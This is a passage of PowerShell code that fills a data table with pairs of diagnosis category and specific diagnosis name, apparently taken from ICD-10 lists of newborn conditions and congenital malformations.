$DiagnosisList.Rows.Add("Other neonatal hemorrhages","Other neonatal gastrointestinal hemorrhage") + $null = $DiagnosisList.Rows.Add("Other neonatal hemorrhages","Neonatal adrenal hemorrhage") + $null = $DiagnosisList.Rows.Add("Other neonatal hemorrhages","Neonatal cutaneous hemorrhage") + $null = $DiagnosisList.Rows.Add("Other neonatal hemorrhages","Neonatal vaginal hemorrhage") + $null = $DiagnosisList.Rows.Add("Other neonatal hemorrhages","Other specified neonatal hemorrhages") + $null = $DiagnosisList.Rows.Add("Other neonatal hemorrhages","Neonatal hemorrhage, unspecified") + $null = $DiagnosisList.Rows.Add("Hemolytic disease of newborn","Rh isoimmunization of newborn") + $null = $DiagnosisList.Rows.Add("Hemolytic disease of newborn","ABO isoimmunization of newborn") + $null = $DiagnosisList.Rows.Add("Hemolytic disease of newborn","Other hemolytic diseases of newborn") + $null = $DiagnosisList.Rows.Add("Hemolytic disease of newborn","Hemolytic disease of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Hydrops fetalis due to hemolytic disease","Hydrops fetalis due to isoimmunization") + $null = $DiagnosisList.Rows.Add("Hydrops fetalis due to other and unspecified hemolytic disease","Hydrops fetalis due to unspecified hemolytic disease") + $null = $DiagnosisList.Rows.Add("Hydrops fetalis due to other and unspecified hemolytic disease","Hydrops fetalis due to other hemolytic disease") + $null = $DiagnosisList.Rows.Add("Kernicterus","Kernicterus due to isoimmunization") + $null = $DiagnosisList.Rows.Add("Kernicterus","Other specified kernicterus") + $null = $DiagnosisList.Rows.Add("Kernicterus","Kernicterus, unspecified") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice due to other excessive hemolysis","Neonatal jaundice due to bruising") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice due to other excessive hemolysis","Neonatal jaundice due to bleeding") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice due to other excessive hemolysis","Neonatal jaundice due to infection") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice due to other excessive hemolysis","Neonatal jaundice due to polycythemia") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice due to drugs or toxins transmitted from mother or given to newborn","Neonatal jaundice due to drugs or toxins transmitted from mother") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice due to drugs or toxins transmitted from mother or given to newborn","Neonatal jaundice due to drugs or toxins given to newborn") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice due to swallowed maternal blood","Neonatal jaundice due to swallowed maternal blood") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice due to other specified excessive hemolysis","Neonatal jaundice due to other specified excessive hemolysis") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice due to excessive hemolysis, unspecified","Neonatal jaundice due to excessive hemolysis, unspecified") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice from other and unspecified causes","Neonatal jaundice associated with preterm delivery") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice from other and unspecified causes","Inspissated bile syndrome") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice from other and unspecified hepatocellular damage","Neonatal jaundice from unspecified hepatocellular damage") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice from other and unspecified hepatocellular damage","Neonatal jaundice from other hepatocellular damage") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice from breast milk inhibitor","Neonatal jaundice from breast milk inhibitor") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice from other specified causes","Neonatal jaundice from other specified causes") + $null = $DiagnosisList.Rows.Add("Neonatal jaundice, unspecified","Neonatal jaundice, unspecified") + $null = $DiagnosisList.Rows.Add("Disseminated intravascular coagulation of newborn","Disseminated intravascular coagulation of newborn") + $null = $DiagnosisList.Rows.Add("Other perinatal hematological disorders","Transient neonatal thrombocytopenia") + $null = $DiagnosisList.Rows.Add("Other perinatal hematological disorders","Polycythemia neonatorum") + $null = $DiagnosisList.Rows.Add("Other perinatal hematological disorders","Anemia of prematurity") + $null = $DiagnosisList.Rows.Add("Other perinatal hematological disorders","Congenital anemia from fetal blood loss") + $null = $DiagnosisList.Rows.Add("Other perinatal hematological disorders","Other congenital anemias, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other perinatal hematological disorders","Transient neonatal neutropenia") + $null = $DiagnosisList.Rows.Add("Other perinatal hematological disorders","Other transient neonatal disorders of coagulation") + $null = $DiagnosisList.Rows.Add("Other perinatal hematological disorders","Other specified perinatal hematological disorders") + $null = $DiagnosisList.Rows.Add("Other perinatal hematological disorders","Perinatal hematological disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Transitory disorders of carbohydrate metabolism specific to newborn","Syndrome of infant of mother with gestational diabetes") + $null = $DiagnosisList.Rows.Add("Transitory disorders of carbohydrate metabolism specific to newborn","Syndrome of infant of a diabetic mother") + $null = $DiagnosisList.Rows.Add("Transitory disorders of carbohydrate metabolism specific to newborn","Neonatal diabetes mellitus") + $null = $DiagnosisList.Rows.Add("Transitory disorders of carbohydrate metabolism specific to newborn","Iatrogenic neonatal hypoglycemia") + $null = $DiagnosisList.Rows.Add("Transitory disorders of carbohydrate metabolism specific to newborn","Other neonatal hypoglycemia") + $null = $DiagnosisList.Rows.Add("Transitory disorders of carbohydrate metabolism specific to newborn","Other transitory disorders of carbohydrate metabolism of newborn") + $null = $DiagnosisList.Rows.Add("Transitory disorders of carbohydrate metabolism specific to newborn","Transitory disorder of carbohydrate metabolism of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Transitory neonatal disorders of calcium and magnesium metabolism","Cow's milk hypocalcemia in newborn") + $null = $DiagnosisList.Rows.Add("Transitory neonatal disorders of calcium and magnesium metabolism","Other neonatal hypocalcemia") + $null = $DiagnosisList.Rows.Add("Transitory neonatal disorders of calcium and magnesium metabolism","Neonatal hypomagnesemia") + $null = $DiagnosisList.Rows.Add("Transitory neonatal disorders of calcium and magnesium metabolism","Neonatal tetany without calcium or magnesium deficiency") + $null = $DiagnosisList.Rows.Add("Transitory neonatal disorders of calcium and magnesium metabolism","Transitory neonatal hypoparathyroidism") + $null = $DiagnosisList.Rows.Add("Transitory neonatal disorders of calcium and magnesium metabolism","Other transitory neonatal disorders of calcium and magnesium metabolism") + $null = $DiagnosisList.Rows.Add("Transitory neonatal disorders of calcium and magnesium metabolism","Transitory neonatal disorder of calcium and magnesium metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal endocrine disorders","Neonatal goiter, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal endocrine disorders","Transitory neonatal hyperthyroidism") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal endocrine disorders","Other transitory neonatal disorders of thyroid function, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal endocrine disorders","Other specified transitory neonatal endocrine disorders") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal endocrine disorders","Transitory neonatal endocrine disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal electrolyte and metabolic disturbances","Late metabolic acidosis of newborn") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal electrolyte and metabolic disturbances","Dehydration of newborn") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal electrolyte and metabolic disturbances","Disturbances of sodium balance of newborn") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal electrolyte and metabolic disturbances","Disturbances of potassium balance of newborn") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal electrolyte and metabolic disturbances","Other transitory electrolyte disturbances of newborn") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal electrolyte and metabolic disturbances","Transitory tyrosinemia of newborn") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal electrolyte and metabolic disturbances","Transitory hyperammonemia of newborn") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal electrolyte and metabolic disturbances","Other transitory metabolic disturbances of newborn") + $null = $DiagnosisList.Rows.Add("Other transitory neonatal electrolyte and metabolic disturbances","Transitory metabolic disturbance of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Other intestinal obstruction of newborn","Meconium plug syndrome") + $null = $DiagnosisList.Rows.Add("Other intestinal obstruction of newborn","Transitory ileus of newborn") + $null = $DiagnosisList.Rows.Add("Other intestinal obstruction of newborn","Intestinal obstruction due to inspissated milk") + $null = $DiagnosisList.Rows.Add("Other intestinal obstruction of newborn","Other specified intestinal obstruction of newborn") + $null = $DiagnosisList.Rows.Add("Other intestinal obstruction of newborn","Intestinal obstruction of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Necrotizing enterocolitis of newborn","Stage 1 necrotizing enterocolitis in newborn") + $null = $DiagnosisList.Rows.Add("Necrotizing enterocolitis of newborn","Stage 2 necrotizing enterocolitis in newborn") + $null = $DiagnosisList.Rows.Add("Necrotizing enterocolitis of newborn","Stage 3 necrotizing enterocolitis in newborn") + $null = $DiagnosisList.Rows.Add("Necrotizing enterocolitis of newborn","Necrotizing enterocolitis in newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Other perinatal digestive system disorders","Perinatal intestinal perforation") + $null = $DiagnosisList.Rows.Add("Other perinatal digestive system disorders","Other neonatal peritonitis") + $null = $DiagnosisList.Rows.Add("Other perinatal digestive system disorders","Neonatal hematemesis and melena due to swallowed maternal blood") + $null = $DiagnosisList.Rows.Add("Other perinatal digestive system disorders","Noninfective neonatal diarrhea") + $null = $DiagnosisList.Rows.Add("Other specified perinatal digestive system disorders","Congenital cirrhosis (of liver)") + $null = $DiagnosisList.Rows.Add("Other specified perinatal digestive system disorders","Peptic ulcer of newborn") + $null = $DiagnosisList.Rows.Add("Other specified perinatal digestive system disorders","Newborn esophageal reflux") + $null = $DiagnosisList.Rows.Add("Other specified perinatal digestive system disorders","Gestational alloimmune liver disease") + $null = $DiagnosisList.Rows.Add("Other specified perinatal digestive system disorders","Other specified perinatal digestive system disorders") + $null = $DiagnosisList.Rows.Add("Perinatal digestive system disorder, unspecified","Perinatal digestive system disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Hypothermia of newborn","Cold injury syndrome") + $null = $DiagnosisList.Rows.Add("Hypothermia of newborn","Other hypothermia of newborn") + $null = $DiagnosisList.Rows.Add("Hypothermia of newborn","Hypothermia of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Other disturbances of temperature regulation of newborn","Environmental hyperthermia of newborn") + $null = $DiagnosisList.Rows.Add("Other disturbances of temperature regulation of newborn","Other specified disturbances of temperature regulation of newborn") + $null = $DiagnosisList.Rows.Add("Other disturbances of temperature regulation of newborn","Disturbance of temperature regulation of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Other conditions of integument specific to newborn","Sclerema neonatorum") + $null = $DiagnosisList.Rows.Add("Other conditions of integument specific to newborn","Neonatal erythema toxicum") + $null = $DiagnosisList.Rows.Add("Other conditions of integument specific to newborn","Hydrops fetalis not due to hemolytic disease") + $null = $DiagnosisList.Rows.Add("Other and unspecified edema specific to newborn","Unspecified edema specific to newborn") + $null = $DiagnosisList.Rows.Add("Other and unspecified edema specific to newborn","Other edema specific to newborn") + $null = $DiagnosisList.Rows.Add("Breast engorgement of newborn","Breast engorgement of newborn") + $null = $DiagnosisList.Rows.Add("Congenital hydrocele","Congenital hydrocele") + $null = $DiagnosisList.Rows.Add("Umbilical polyp of newborn","Umbilical polyp of newborn") + $null = $DiagnosisList.Rows.Add("Other specified conditions of integument specific to newborn","Umbilical granuloma") + $null = $DiagnosisList.Rows.Add("Other specified conditions of integument specific to newborn","Other specified conditions of integument specific to newborn") + $null = $DiagnosisList.Rows.Add("Condition of the integument specific to newborn, unspecified","Condition of the integument specific to newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Other problems with newborn","Other problems with newborn") + $null = $DiagnosisList.Rows.Add("Convulsions of newborn","Convulsions of newborn") + $null = $DiagnosisList.Rows.Add("Other disturbances of cerebral status of newborn","Neonatal cerebral ischemia") + $null = $DiagnosisList.Rows.Add("Other disturbances of cerebral status of newborn","Acquired periventricular cysts of newborn") + $null = $DiagnosisList.Rows.Add("Other disturbances of cerebral status of newborn","Neonatal cerebral leukomalacia") + $null = $DiagnosisList.Rows.Add("Other disturbances of cerebral status of newborn","Neonatal cerebral irritability") + $null = $DiagnosisList.Rows.Add("Other disturbances of cerebral status of newborn","Neonatal cerebral depression") + $null = $DiagnosisList.Rows.Add("Other disturbances of cerebral status of newborn","Neonatal coma") + $null = $DiagnosisList.Rows.Add("Hypoxic ischemic encephalopathy [HIE]","Hypoxic ischemic encephalopathy [HIE], unspecified") + $null = $DiagnosisList.Rows.Add("Hypoxic ischemic encephalopathy [HIE]","Mild hypoxic ischemic encephalopathy [HIE]") + $null = $DiagnosisList.Rows.Add("Hypoxic ischemic encephalopathy [HIE]","Moderate hypoxic ischemic encephalopathy [HIE]") + $null = $DiagnosisList.Rows.Add("Hypoxic ischemic encephalopathy [HIE]","Severe hypoxic ischemic encephalopathy [HIE]") + $null = $DiagnosisList.Rows.Add("Neonatal encephalopathy","Neonatal encephalopathy in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Neonatal encephalopathy","Neonatal encephalopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified disturbances of cerebral status of newborn","Other specified disturbances of cerebral status of newborn") + $null = $DiagnosisList.Rows.Add("Disturbance of cerebral status of newborn, unspecified","Disturbance of cerebral status of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Vomiting of newborn","Bilious vomiting of newborn") + $null = $DiagnosisList.Rows.Add("Vomiting of newborn","Other vomiting of newborn") + $null = $DiagnosisList.Rows.Add("Regurgitation and rumination of newborn","Regurgitation and rumination of newborn") + $null = $DiagnosisList.Rows.Add("Slow feeding of newborn","Slow feeding of newborn") + $null = $DiagnosisList.Rows.Add("Underfeeding of newborn","Underfeeding of newborn") + $null = $DiagnosisList.Rows.Add("Overfeeding of newborn","Overfeeding of newborn") + $null = $DiagnosisList.Rows.Add("Neonatal difficulty in feeding at breast","Neonatal difficulty in feeding at breast") + $null = $DiagnosisList.Rows.Add("Failure to thrive in newborn","Failure to thrive in newborn") + $null = $DiagnosisList.Rows.Add("Other feeding problems of newborn","Other feeding problems of newborn") + $null = $DiagnosisList.Rows.Add("Feeding problem of newborn, unspecified","Feeding problem of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Reactions and intoxications due to drugs administered to newborn","Grey baby syndrome") + $null = $DiagnosisList.Rows.Add("Reactions and intoxications due to drugs administered to newborn","Other reactions and intoxications due to drugs administered to newborn") + $null = $DiagnosisList.Rows.Add("Disorders of muscle tone of newborn","Transient neonatal myasthenia gravis") + $null = $DiagnosisList.Rows.Add("Disorders of muscle tone of newborn","Congenital hypertonia") + $null = $DiagnosisList.Rows.Add("Disorders of muscle tone of newborn","Congenital hypotonia") + $null = $DiagnosisList.Rows.Add("Disorders of muscle tone of newborn","Other disorders of muscle tone of newborn") + $null = $DiagnosisList.Rows.Add("Disorders of muscle tone of newborn","Disorder of muscle tone of newborn, unspecified") + $null = $DiagnosisList.Rows.Add("Stillbirth","Stillbirth") + $null = $DiagnosisList.Rows.Add("Other conditions originating in the perinatal period","Congenital renal failure") + $null = $DiagnosisList.Rows.Add("Other conditions originating in the perinatal period","Neonatal withdrawal symptoms from maternal use of drugs of addiction") + $null = $DiagnosisList.Rows.Add("Other conditions originating in the perinatal period","Withdrawal symptoms from therapeutic use of drugs in newborn") + $null = $DiagnosisList.Rows.Add("Other conditions originating in the perinatal period","Wide cranial sutures of newborn") + $null = $DiagnosisList.Rows.Add("Other conditions originating in the perinatal period","Complication to newborn due to (fetal) intrauterine procedure") + $null = $DiagnosisList.Rows.Add("Other specified conditions originating in the perinatal period","Exposure to (parental) (environmental) tobacco smoke in the perinatal period") + $null = $DiagnosisList.Rows.Add("Other specified conditions originating in the perinatal period","Delayed separation of umbilical cord") + $null = $DiagnosisList.Rows.Add("Other specified conditions originating in the perinatal period","Meconium staining") + $null = $DiagnosisList.Rows.Add("Other specified conditions originating in the perinatal period","Other specified conditions originating in the perinatal period") + $null = $DiagnosisList.Rows.Add("Condition originating in the perinatal period, unspecified","Condition originating in the perinatal period, unspecified") + $null = $DiagnosisList.Rows.Add("Anencephaly and similar malformations","Anencephaly") + $null = $DiagnosisList.Rows.Add("Anencephaly and similar malformations","Craniorachischisis") + $null = $DiagnosisList.Rows.Add("Anencephaly and similar malformations","Iniencephaly") + $null = $DiagnosisList.Rows.Add("Encephalocele","Frontal encephalocele") + $null = $DiagnosisList.Rows.Add("Encephalocele","Nasofrontal encephalocele") + $null = $DiagnosisList.Rows.Add("Encephalocele","Occipital encephalocele") + $null = $DiagnosisList.Rows.Add("Encephalocele","Encephalocele of other sites") + $null = $DiagnosisList.Rows.Add("Encephalocele","Encephalocele, unspecified") + $null = $DiagnosisList.Rows.Add("Microcephaly","Microcephaly") + $null = $DiagnosisList.Rows.Add("Congenital hydrocephalus","Malformations of aqueduct of Sylvius") + $null = $DiagnosisList.Rows.Add("Congenital hydrocephalus","Atresia of foramina of Magendie and Luschka") + $null = $DiagnosisList.Rows.Add("Congenital hydrocephalus","Other congenital hydrocephalus") + $null = $DiagnosisList.Rows.Add("Congenital hydrocephalus","Congenital hydrocephalus, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of brain","Congenital malformations of corpus callosum") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of brain","Arhinencephaly") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of brain","Holoprosencephaly") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of brain","Other reduction deformities of brain") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of brain","Septo-optic dysplasia of brain") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of brain","Megalencephaly") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of brain","Congenital cerebral cysts") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of brain","Other specified congenital malformations of brain") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of brain","Congenital malformation of brain, unspecified") + $null = $DiagnosisList.Rows.Add("Spina bifida","Cervical spina bifida with hydrocephalus") + $null = $DiagnosisList.Rows.Add("Spina bifida","Thoracic spina bifida with hydrocephalus") + $null = $DiagnosisList.Rows.Add("Spina bifida","Lumbar spina bifida with hydrocephalus") + $null = $DiagnosisList.Rows.Add("Spina bifida","Sacral spina bifida with hydrocephalus") + $null = $DiagnosisList.Rows.Add("Spina bifida","Unspecified spina bifida with hydrocephalus") + $null = $DiagnosisList.Rows.Add("Spina bifida","Cervical spina bifida without hydrocephalus") + $null = $DiagnosisList.Rows.Add("Spina bifida","Thoracic spina bifida without hydrocephalus") + $null = $DiagnosisList.Rows.Add("Spina bifida","Lumbar spina bifida without hydrocephalus") + $null = $DiagnosisList.Rows.Add("Spina bifida","Sacral spina bifida without hydrocephalus") + $null = $DiagnosisList.Rows.Add("Spina bifida","Spina bifida, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of spinal cord","Amyelia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of spinal cord","Hypoplasia and dysplasia of spinal cord") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of spinal cord","Diastematomyelia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of spinal cord","Other congenital cauda equina malformations") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of spinal cord","Hydromyelia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of spinal cord","Other specified congenital malformations of spinal cord") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of spinal cord","Congenital malformation of spinal cord, unspecified") + $null = $DiagnosisList.Rows.Add("Arnold-Chiari syndrome","Arnold-Chiari syndrome without spina bifida or hydrocephalus") + $null = $DiagnosisList.Rows.Add("Arnold-Chiari syndrome","Arnold-Chiari syndrome with spina bifida") + $null = $DiagnosisList.Rows.Add("Arnold-Chiari syndrome","Arnold-Chiari syndrome with hydrocephalus") + $null = $DiagnosisList.Rows.Add("Arnold-Chiari syndrome","Arnold-Chiari syndrome with spina bifida and hydrocephalus") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformations of nervous system","Other specified congenital malformations of nervous system") + $null = $DiagnosisList.Rows.Add("Congenital malformation of nervous system, unspecified","Congenital malformation of nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of eyelid, lacrimal apparatus and orbit","Congenital ptosis") + $null = $DiagnosisList.Rows.Add("Congenital malformations of eyelid, lacrimal apparatus and orbit","Congenital ectropion") + $null = $DiagnosisList.Rows.Add("Congenital malformations of eyelid, lacrimal apparatus and orbit","Congenital entropion") + $null = $DiagnosisList.Rows.Add("Congenital malformations of eyelid, lacrimal apparatus and orbit","Other congenital malformations of eyelid") + $null = $DiagnosisList.Rows.Add("Congenital malformations of eyelid, lacrimal apparatus and orbit","Absence and agenesis of lacrimal apparatus") + $null = $DiagnosisList.Rows.Add("Congenital malformations of eyelid, lacrimal apparatus and orbit","Congenital stenosis and stricture of lacrimal duct") + $null = $DiagnosisList.Rows.Add("Congenital malformations of eyelid, lacrimal apparatus and orbit","Other congenital malformations of lacrimal apparatus") + $null = $DiagnosisList.Rows.Add("Congenital malformations of eyelid, lacrimal apparatus and orbit","Congenital malformation of orbit") + $null = $DiagnosisList.Rows.Add("Anophthalmos, microphthalmos and macrophthalmos","Cystic eyeball") + $null = $DiagnosisList.Rows.Add("Anophthalmos, microphthalmos and macrophthalmos","Other anophthalmos") + $null = $DiagnosisList.Rows.Add("Anophthalmos, microphthalmos and macrophthalmos","Microphthalmos") + $null = $DiagnosisList.Rows.Add("Anophthalmos, microphthalmos and macrophthalmos","Macrophthalmos") + $null = $DiagnosisList.Rows.Add("Congenital lens malformations","Congenital cataract") + $null = $DiagnosisList.Rows.Add("Congenital lens malformations","Congenital displaced lens") + $null = $DiagnosisList.Rows.Add("Congenital lens malformations","Coloboma of lens") + $null = $DiagnosisList.Rows.Add("Congenital lens malformations","Congenital aphakia") + $null = $DiagnosisList.Rows.Add("Congenital lens malformations","Spherophakia") + $null = $DiagnosisList.Rows.Add("Congenital lens malformations","Other congenital lens malformations") + $null = $DiagnosisList.Rows.Add("Congenital lens malformations","Congenital lens malformation, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of anterior segment of eye","Coloboma of iris") + $null = $DiagnosisList.Rows.Add("Congenital malformations of anterior segment of eye","Absence of iris") + $null = $DiagnosisList.Rows.Add("Congenital malformations of anterior segment of eye","Other congenital malformations of iris") + $null = $DiagnosisList.Rows.Add("Congenital malformations of anterior segment of eye","Congenital corneal opacity") + $null = $DiagnosisList.Rows.Add("Congenital malformations of anterior segment of eye","Other congenital corneal malformations") + $null = $DiagnosisList.Rows.Add("Congenital malformations of anterior segment of eye","Blue sclera") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of anterior segment of eye","Rieger's anomaly") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of anterior segment of eye","Other congenital malformations of anterior segment of eye") + $null = $DiagnosisList.Rows.Add("Congenital malformation of anterior segment of eye, unspecified","Congenital malformation of anterior segment of eye, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of posterior segment of eye","Congenital malformation of vitreous humor") + $null = $DiagnosisList.Rows.Add("Congenital malformations of posterior segment of eye","Congenital malformation of retina") + $null = $DiagnosisList.Rows.Add("Congenital malformations of posterior segment of eye","Congenital malformation of optic disc") + $null = $DiagnosisList.Rows.Add("Congenital malformations of posterior segment of eye","Congenital malformation of choroid") + $null = $DiagnosisList.Rows.Add("Congenital malformations of posterior segment of eye","Other congenital malformations of posterior segment of eye") + $null = $DiagnosisList.Rows.Add("Congenital malformations of posterior segment of eye","Congenital malformation of posterior segment of eye, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of eye","Congenital glaucoma") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of eye","Other specified congenital malformations of eye") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of eye","Congenital malformation of eye, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of ear causing impairment of hearing","Congenital absence of (ear) auricle") + $null = $DiagnosisList.Rows.Add("Congenital malformations of ear causing impairment of hearing","Congenital absence, atresia and stricture of auditory canal (external)") + $null = $DiagnosisList.Rows.Add("Congenital malformations of ear causing impairment of hearing","Absence of eustachian tube") + $null = $DiagnosisList.Rows.Add("Congenital malformations of ear causing impairment of hearing","Congenital malformation of ear ossicles") + $null = $DiagnosisList.Rows.Add("Congenital malformations of ear causing impairment of hearing","Other congenital malformations of middle ear") + $null = $DiagnosisList.Rows.Add("Congenital malformations of ear causing impairment of hearing","Congenital malformation of inner ear") + $null = $DiagnosisList.Rows.Add("Congenital malformations of ear causing impairment of hearing","Congenital malformation of ear causing impairment of hearing, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ear","Accessory auricle") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ear","Macrotia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ear","Microtia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ear","Other misshapen ear") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ear","Misplaced ear") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ear","Prominent ear") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ear","Other specified congenital malformations of ear") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ear","Congenital malformation of ear, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of face and neck","Sinus, fistula and cyst of branchial cleft") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of face and neck","Preauricular sinus and cyst") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of face and neck","Other branchial cleft malformations") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of face and neck","Webbing of neck") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of face and neck","Macrostomia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of face and neck","Microstomia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of face and neck","Macrocheilia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of face and neck","Microcheilia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of face and neck","Other specified congenital malformations of face and neck") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of face and neck","Congenital malformation of face and neck, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac chambers and connections","Common arterial trunk") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac chambers and connections","Double outlet right ventricle") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac chambers and connections","Double outlet left ventricle") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac chambers and connections","Discordant ventriculoarterial connection") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac chambers and connections","Double inlet ventricle") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac chambers and connections","Discordant atrioventricular connection") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac chambers and connections","Isomerism of atrial appendages") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac chambers and connections","Other congenital malformations of cardiac chambers and connections") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac chambers and connections","Congenital malformation of cardiac chambers and connections, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac septa","Ventricular septal defect") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac septa","Atrial septal defect") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac septa","Atrioventricular septal defect") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac septa","Tetralogy of Fallot") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac septa","Aortopulmonary septal defect") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac septa","Other congenital malformations of cardiac septa") + $null = $DiagnosisList.Rows.Add("Congenital malformations of cardiac septa","Congenital malformation of cardiac septum, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of pulmonary and tricuspid valves","Pulmonary valve atresia") + $null = $DiagnosisList.Rows.Add("Congenital malformations of pulmonary and tricuspid valves","Congenital pulmonary valve stenosis") + $null = $DiagnosisList.Rows.Add("Congenital malformations of pulmonary and tricuspid valves","Congenital pulmonary valve insufficiency") + $null = $DiagnosisList.Rows.Add("Congenital malformations of pulmonary and tricuspid valves","Other congenital malformations of pulmonary valve") + $null = $DiagnosisList.Rows.Add("Congenital malformations of pulmonary and tricuspid valves","Congenital tricuspid stenosis") + $null = $DiagnosisList.Rows.Add("Congenital malformations of pulmonary and tricuspid valves","Ebstein's anomaly") + $null = $DiagnosisList.Rows.Add("Congenital malformations of pulmonary and tricuspid valves","Hypoplastic right heart syndrome") + $null = $DiagnosisList.Rows.Add("Congenital malformations of pulmonary and tricuspid valves","Other congenital malformations of tricuspid valve") + $null = $DiagnosisList.Rows.Add("Congenital malformations of pulmonary and tricuspid valves","Congenital malformation of tricuspid valve, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of aortic and mitral valves","Congenital stenosis of aortic valve") + $null = $DiagnosisList.Rows.Add("Congenital malformations of aortic and mitral valves","Congenital insufficiency of aortic valve") + $null = $DiagnosisList.Rows.Add("Congenital malformations of aortic and mitral valves","Congenital mitral stenosis") + $null = $DiagnosisList.Rows.Add("Congenital malformations of aortic and mitral valves","Congenital mitral insufficiency") + $null = $DiagnosisList.Rows.Add("Congenital malformations of aortic and mitral valves","Hypoplastic left heart syndrome") + $null = $DiagnosisList.Rows.Add("Congenital malformations of aortic and mitral valves","Other congenital malformations of aortic and mitral valves") + $null = $DiagnosisList.Rows.Add("Congenital malformations of aortic and mitral valves","Congenital malformation of aortic and mitral valves, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of heart","Dextrocardia") + $null = $DiagnosisList.Rows.Add("Other 